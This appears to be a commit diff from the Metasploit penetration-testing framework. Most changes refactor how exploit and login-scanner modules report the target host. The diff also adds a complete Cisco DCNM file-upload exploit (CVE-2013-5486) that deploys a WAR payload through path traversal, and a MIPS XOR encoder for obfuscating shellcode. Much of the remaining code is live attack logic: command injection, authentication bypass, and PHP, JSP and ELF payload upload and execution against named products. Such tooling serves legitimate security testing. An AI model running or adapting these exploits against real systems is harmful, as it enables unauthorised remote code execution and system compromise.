:port => rport,
:sname => 'Oracle Integrated Lights Out Manager Portal',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
end
end

9
modules/auxiliary/scanner/http/vcms_login.rb
View File

@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
'cookie' => sid
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond")
vprint_error("#{peer} - Service failed to respond")
return :abort
end
@ -86,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
when /User name already confirmed/
return :skip_user
when /Invalid password/
vprint_status("#{@peer} - Username found: #{user}")
vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
:port => rport,
@ -108,10 +108,9 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
}
end

146
modules/encoders/mipsbe/byte_xori.rb Normal file
View File

@ -0,0 +1,146 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Encoder::Xor
Rank = NormalRanking
def initialize
super(
'Name' => 'Byte XORi Encoder',
'Description' => %q{
Mips Web server exploit friendly xor encoder. This encoder has been found useful on
situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS
architectures, this one is based on the xori instruction.
},
'Author' =>
[
'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
'juan vazquez' # byte_xori encoder
],
'Arch' => ARCH_MIPSBE,
'License' => MSF_LICENSE,
'Decoder' =>
{
'KeySize' => 1,
'BlockSize' => 1,
'KeyPack' => 'C',
})
end
#
# Returns the decoder stub that is adjusted for the size of the buffer
# being encoded.
#
def decoder_stub(state)
# add 4 number of passes for the space reserved for the key, at the end of the decoder stub
# (see commented source)
number_of_passes=state.buf.length+4
raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766
# 16-bits not (again, see also commented source)
reg_14 = (number_of_passes+1)^0xFFFF
decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
main:
li macro reg, imm
addiu reg, $0, imm ; 0x24xxyyyy - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff
endm
li ($14, #{reg_14}) ; 0x240exxxx - store in $14 the number of passes (two's complement) - xxxx (number of passes)
nor $14, $14, $0 ; 0x01c07027 - get in $14 the number of passes
li ($11,-69) ; 0x240bffbb - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)
; acts as getpc
next:
bltzal $8, next ; 0x0510ffff - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.
slti $8, $0, 0x#{slti_imm(state)} ; 0x2808xxxx - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm
nor $11, $11, $0 ; 0x01605827 - get in $11 the offset to the end of the decoder (from the addu instr)
addu $25, $31, $11 ; 0x03ebc821 - get in $25 a pointer to the end of the decoder stub
slti $23, $0, 0x#{slti_imm(state)} ; 0x2817xxxx - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm
lb $17, -1($25) ; 0x8f31fffc - Load xor key in $17 (stored on the last byte of the decoder stub)
; Init $6 and $15
li ($13, -4) ; 0x240dfffc - $13 = -4
nor $6, $13, $0 ; 0x01a03027 - $6 = 3 ; used to easily get the cacheflush parameter
addi $15, $6, -2 ; 0x20cffffe - $15 = 1 ($15 = decoding loop counter increment)
; In order avoid null bytes, decode also the xor key, so memory can be
; referenced with offset -1
loop:
lb $8, -4($25) ; 0x8f28fffc - Load in $8 the byte to decode
addu $23, $23, $15 ; 0x02efb821 - Increment the counter ($23)
xori $3, $8, 0x#{padded_key(state)} ; 0x01111826 - xori decoding instruction, store the decoded byte on $3
#{set_on_less_than(state)} ; 0x02eef0xx - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt
sb $3, -4($25) ; 0xaf23fffc - Store decoded byte on memory
bne $0, $30, loop ; 0x17c0fff9 - branch to loop if $30 != 0 (ranch while bytes to decode)
addu $25, $25, $15 ; 0x032dc821 - next instruction to decode, executed because of the pipelining
li ($2, 4147) ; 0x24021033 - cacheflush sytem call
syscall 0x52950 ; 0x014a540c
nop ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop
EOS
return decoder
end
def padded_key(state, size=1)
key = Rex::Text.rand_text(size, state.badchars)
key << [state.key].pack("C")
return key.unpack("n")[0].to_s(16)
end
# Returns an two-bytes immediate value without badchars. The value must be
# on the 0x8000-0x8fff so it is used as negative value by slti (set less
# than signed immediate)
def slti_imm(state)
imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack("C*"))
return imm.unpack("n")[0].to_s(16)
end
# Since 0x14 contains the number of passes, and because of the li macro, can't be
# longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used
# here
def set_on_less_than(state)
instructions = {
"sltu $30, $23, $14" => "\x02\xee\xf0\x2b", # set less than unsigned
"slt $30, $23, $14" => "\x02\xee\xf0\x2a" # set less than
}
instructions.each do |k,v|
if Rex::Text.badchar_index(v, state.badchars) == nil
return k
end
end
raise BadcharError.new,
"The #{self.name} encoder failed to encode the decoder stub without bad characters.",
caller
end
def encode_finalize_stub(state, stub)
# Including the key into the stub by ourselves because it should be located
# in the last 4 bytes of the decoder stub. In this way decoding will convert
# these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports
# one decoder_key_offset position
real_key = state.key
stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
return stub
end
end

4
modules/exploits/linux/http/astium_sqli_upload.rb
View File

@ -48,10 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def uri
return target_uri.path
end

18
modules/exploits/linux/http/mutiny_frontend_upload.rb
View File

@ -140,40 +140,38 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Trying to login")
print_status("#{peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
print_good("#{peer} - Login successful")
else
fail_with(Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options")
fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options")
end
exploit_native
end
def exploit_native
print_status("#{@peer} - Uploading executable Payload file")
print_status("#{peer} - Uploading executable Payload file")
elf = payload.encoded_exe
elf_location = "/tmp"
elf_filename = "#{rand_text_alpha_lower(8)}.elf"
if upload_file(elf_location, elf_filename, elf)
register_files_for_cleanup("#{elf_location}/#{elf_filename}")
else
fail_with(Failure::Unknown, "#{@peer} - Payload upload failed")
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{@peer} - Uploading JSP to execute the payload")
print_status("#{peer} - Uploading JSP to execute the payload")
jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
if upload_file(jsp_location, jsp_filename, jsp)
register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
else
fail_with(Failure::Unknown, "#{@peer} - JSP upload failed")
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
end
print_status("#{@peer} - Executing payload")
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "m", jsp_filename),

9
modules/exploits/linux/http/netgear_readynas_exec.rb
View File

@ -15,10 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'NETGEAR ReadyNAS Perl Code Evaluation',
'Description' => %q{
This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
vulnerability exists on the web fronted, specifically on the np_handler.pl component,
due to the insecure usage of the eval() perl function. This module has been tested
successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
hardware.
vulnerability exists on the web front end, specifically in the np_handler.pl component,
due to an insecure usage of the eval() perl function. This module has been tested
successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.
},
'Author' =>
[
@ -49,6 +48,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
# Tested on an emulated environment, need to check this
# against a real device
[ 'NETGEAR ReadyNAS 4.2.23', { }]
],
'DefaultOptions' =>

13
modules/exploits/linux/http/openfiler_networkcard_exec.rb
View File

@ -69,11 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page
print_status("#{@peer} - Sending check")
print_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
@ -86,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
@ -98,14 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("&#{payload.raw}&")
# send payload
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/admin/system.html?step=2&device=lo#{cmd}",
@ -116,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed')
else

14
modules/exploits/linux/http/wanem_exec.rb
View File

@ -65,12 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26"
print_status("#{@peer} - Sending check")
print_status("#{peer} - Sending check")
begin
res = send_request_cgi({
@ -79,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
@ -91,11 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode(payload.raw)
data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => '/WANem/result.php',
@ -103,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
print_good("#{peer} - Payload sent successfully")
else
print_error("#{@peer} - Sending payload failed")
print_error("#{peer} - Sending payload failed")
end
end

11
modules/exploits/linux/http/zen_load_balancer_exec.rb
View File

@ -65,11 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from config file
print_status("#{@peer} - Sending check")
print_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/config/global.conf'
@ -82,15 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
def exploit
@peer = "#{rhost}:#{rport}"
user = datastore['USERNAME']
pass = datastore['PASSWORD']
auth = Rex::Text.encode_base64("#{user}:#{pass}")
@ -98,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
lines = rand(100) + 1
# send payload
print_status("#{@peer} - Sending payload (#{payload.encoded.length} bytes)")
print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}",

17
modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
View File

@ -63,9 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
# retrieve software version from login page
begin
res = send_request_raw({
@ -76,22 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
def exploit
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME']
password = datastore['PASSWORD']
command = URI.encode(payload.encoded)+"%26"
postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}"
# send payload
print_status("#{@peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)")
begin
res = send_request_cgi({
'method' => 'POST',
@ -99,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{postdata}",
})
if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/
print_error("#{@peer} - Authentication failed. Incorrect username/password.")
print_error("#{peer} - Authentication failed. Incorrect username/password.")
return
end
print_status("#{@peer} - Sent payload successfully")
print_status("#{peer} - Sent payload successfully")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
rescue
print_error("#{@peer} - Sending payload failed")
print_error("#{peer} - Sending payload failed")
end
handler

10
modules/exploits/multi/http/auxilium_upload_exec.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - No response from host")
print_error("#{peer} - No response from host")
return
end
print_status("#{@peer} - Requesting '#{php_fname}'...")
print_status("#{peer} - Requesting '#{php_fname}'...")
res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return
end
@ -103,8 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")

153
modules/exploits/multi/http/cisco_dcnm_upload.rb Normal file
View File

@ -0,0 +1,153 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-5486'],
[ 'OSVDB', '97426' ],
[ 'ZDI', '13-254' ],
[ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Cisco DCNM 6.1(2) / Java Universal',
{
'AutoDeployPath' => "../../../../../deploy",
'CleanupPath' => "../../jboss-4.2.2.GA/server/fm/deploy"
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 18 2013'))
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
], self.class)
end
def upload_file(location, filename, contents)
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
'method' => 'POST',
'encode_params' => false,
'vars_post' =>
{
"mode" => "save",
"savefile" => "true",
"chartid" => "#{location}/#{filename}%00",
"data" => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
}
})
if res and res.code == 200 and res.body.to_s =~ /success/
return true
else
return false
end
end
def check
version = ""
res = send_request_cgi({
'url' => target_uri.to_s,
'method' => 'GET'
})
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/ and
res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
version = $1
print_status("Cisco Primer Data Center Network Manager version #{version} found")
elsif res.code == 200 and
res.body.to_s =~ /Data Center Network Manager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if version =~ /6\.1/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
attempts = datastore['ATTEMPTS']
fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0
app_base = rand_text_alphanumeric(4+rand(32-4))
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
war_location = target['AutoDeployPath']
print_status("#{peer} - Uploading WAR file #{war_filename}...")
res = upload_file(war_location, war_filename, war)
if res
register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
end
attempts.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end

7
modules/exploits/multi/http/cuteflow_upload_exec.rb
View File

@ -99,20 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# upload PHP payload to upload/___1/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, fname, php)
if res.nil?
print_error("#{@peer} - Uploading PHP payload failed")
print_error("#{peer} - Uploading PHP payload failed")
return
end
# retrieve and execute PHP payload
print_status("#{@peer} - Retrieving file: #{fname}")
print_status("#{peer} - Retrieving file: #{fname}")
send_request_raw({
'method' => 'GET',
'uri' => normalize_uri(base, "upload/___1/#{fname}")

38
modules/exploits/multi/http/extplorer_upload_exec.rb
View File

@ -135,22 +135,22 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME']
datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";"
# bypass auth
print_status("#{@peer} - Authenticating as user (#{user})")
print_status("#{peer} - Authenticating as user (#{user})")
res = auth_bypass(base, user)
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
print_status("#{@peer} - Authenticated successfully")
print_status("#{peer} - Authenticated successfully")
else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
# search for writable directories
print_status("#{@peer} - Retrieving writable subdirectories")
print_status("#{peer} - Retrieving writable subdirectories")
begin
res = send_request_cgi({
'method' => 'POST',
@ -159,32 +159,32 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
dir = "#{base}#{$1}"
print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})")
print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})")
else
dir = "#{base}"
print_error("#{@peer} - Could not find a writable subdirectory.")
print_error("#{peer} - Could not find a writable subdirectory.")
end
# upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, dir, @fname, php)
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# search directories in the web root for the file
print_status("#{@peer} - Searching directories for file (#{@fname})")
print_status("#{peer} - Searching directories for file (#{@fname})")
begin
res = send_request_cgi({
'method' => 'POST',
@ -193,27 +193,27 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'],
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
dir = $1.gsub('\\','')
print_good("#{@peer} - Successfully found file")
print_good("#{peer} - Successfully found file")
else
print_error("#{@peer} - Failed to find file")
print_error("#{peer} - Failed to find file")
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})")
print_status("#{peer} - Executing payload (/#{dir}/#{@fname})")
begin
send_request_cgi({
'method' => 'GET',
'uri' => "/#{dir}/#{@fname}"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code != 200
print_error("#{@peer} - Executing payload failed")
print_error("#{peer} - Executing payload failed")
end
end
end

29
modules/exploits/multi/http/glossword_upload_exec.rb
View File

@ -124,38 +124,37 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
# login; get session id and token
print_status("#{@peer} - Authenticating as user '#{user}'")
print_status("#{peer} - Authenticating as user '#{user}'")
res = login(base, user, pass)
if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
token = "#{$1}"
sid = "#{$2}"
print_good("#{@peer} - Authenticated successfully")
print_good("#{peer} - Authenticated successfully")
else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
# upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, sid, @fname, php)
if res and res.code == 301 and res['location'] =~ /Setting saved/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# retrieve PHP file path
print_status("#{@peer} - Locating PHP payload file")
print_status("#{peer} - Locating PHP payload file")
begin
res = send_request_cgi({
'method' => 'GET',
@ -163,28 +162,28 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "sid#{token}=#{sid}"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
shell_uri = "#{$1}"
@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
print_good("#{@peer} - Found payload file path (#{shell_uri})")
print_good("#{peer} - Found payload file path (#{shell_uri})")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path")
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{shell_uri})")
print_status("#{peer} - Executing payload (#{shell_uri})")
begin
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, shell_uri),
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if !res or res.code != 200
fail_with(Failure::UnexpectedReply, "#{@peer} - Executing payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
end
end
end

29
modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
View File

@ -84,20 +84,19 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
# Create user with empty credentials
print_status("#{@peer} - Creating user with empty credentials")
print_status("#{peer} - Creating user with empty credentials")
if create_user.nil?
print_error("#{@peer} - Failed to create user")
print_error("#{peer} - Failed to create user")
return
end
# Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID")
print_status("#{peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi(
'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST'
@ -106,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
session_id = $1
else
print_error("#{@peer} - Retrieve of initial JSESSIONID failed")
print_error("#{peer} - Retrieve of initial JSESSIONID failed")
return
end
# Authenticate
login_data = "j_username=&j_password="
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
print_status("#{peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi(
{
'uri' => normalize_uri(@uri, 'j_security_check'),
@ -130,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote
session_id = $1
